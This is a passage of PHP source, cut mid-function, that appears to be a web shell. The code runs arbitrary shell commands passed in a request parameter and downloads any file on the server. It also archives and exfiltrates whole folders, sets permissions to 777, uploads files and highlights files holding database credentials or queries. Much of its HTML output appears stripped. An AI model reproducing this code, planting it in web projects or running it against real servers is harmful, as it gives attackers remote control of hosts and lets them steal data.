$val)//Process .. directories and a single . { if($val=="..") { $parts[$key]=""; $lastKey=$key-1; $parts[$lastKey]=""; } elseif($val==".") { $parts[$key]=""; } } reset($parts); $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it $firstPiece=true; foreach($parts as $val)//Assemble the path back together { if($val != "") { $fixedPath .= ($firstPiece ? '' : $slash) . $val; $firstPiece=false; } } if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error { $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); } //Make sure there is an ending slash if(substr($fixedPath,-1)!=$slash) $fixedPath .= $slash; return $fixedPath; } if(isset($_REQUEST['chm'])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign"); } } elseif(isset($_REQUEST['phpinfo'])) { phpinfo(); } elseif(isset($_REQUEST['dl'])) { if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true) { $_REQUEST['dl'] .= $_REQUEST['file']; if(substr($_REQUEST['dl'],0,1)==$slash) $fileArr=explode($slash,$_REQUEST['dl']); header('Content-disposition: attachment; filename=' . $_REQUEST['file']); header('Content-type: application/octet-stream'); readfile($_REQUEST['dl']); } else { echo $_REQUEST['dl']; } } elseif(isset($_REQUEST["gz"])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { $directory=$_REQUEST["gz"]; if(substr($directory,-1)=="/") $directory = substr($directory,0,-1); $dirParts=explode($slash,$directory); $fname=$dirParts[(sizeof($dirParts)-1)]; $archive = time(); exec( "cd $directory; tar czf $archive *"); $output=@file_get_contents($directory . "/" . $archive); if(!$output) header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); else { header("Content-disposition: attachment; filename=$fname.tgz"); echo $output; } header('Content-type: application/octet-stream'); @unlink($directory . "/" . $archive); } } elseif(isset($_REQUEST['f'])) { $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); header("Content-Type: text/plain"); fpassthru($file); } elseif(isset($_REQUEST['d'])) { $d=$_REQUEST['d']; echo "
"; if ($handle = opendir("$d")) { echo "listing of "; $conString=""; if($isLinux) echo "$slash"; foreach(explode($slash,cleanPath($d,$isLinux)) as $val) { $conString .= $val . $slash; echo "" . $val . "" . ($val != "" ? $slash : ''); } echo " (upload file) (DB interaction files in red)
(gzip & download folder) (chmod folder to 777) (these rarely work)
"; while ($dir = readdir($handle)) { if (is_dir("$d$slash$dir")) { if($dir != "." && $dir !="..") $dirList[]=$dir; } else { if(isset($_REQUEST["hldb"])) { $contents=file_get_contents("$d$slash$dir"); if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) { $fileList[]=array('dir'=>$dir,'color'=>'red'); } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } } echo ".\n"; echo "..\n"; //Some configurations throw a notice if is_array is tried with a non-existant variable if(isset($dirList)) if(is_array($dirList)) foreach($dirList as $dir) { echo "$dir\n"; } if(isset($fileList)) if(is_array($fileList)) foreach($fileList as $dir) { echo "" . $dir['dir'] . "" . "|Download|" . "|Edit|" . "|Delete| \n"; } } else echo "opendir() failed"; closedir($handle); } elseif(isset($_REQUEST['c'])) { if( @ini_get('safe_mode') ) { echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
'; } echo "Command: " . $_REQUEST['c'] . "
"; trim(exec($_REQUEST['c'],$return)); foreach($return as $val) { echo '' . htmlentities($val) . ''; } } elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) { if(isset($_FILES["file_name"])) { if ($_FILES["file_name"]["error"] > 0) { echo "Error"; } else { $target_path = $_COOKIE["uploadDir"]; if(substr($target_path,-1) != "/") $target_path .= "/"; $target_path = $target_path . basename( $_FILES['file_name']['name']); if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) { setcookie("uploadDir",""); echo "The file ". basename( $_FILES['file_name']['name']). " has been uploaded"; } else { echo "Error copying file, likely a permission error."; } } } else { ?>
$key | "; } echo "
$val | "; } echo "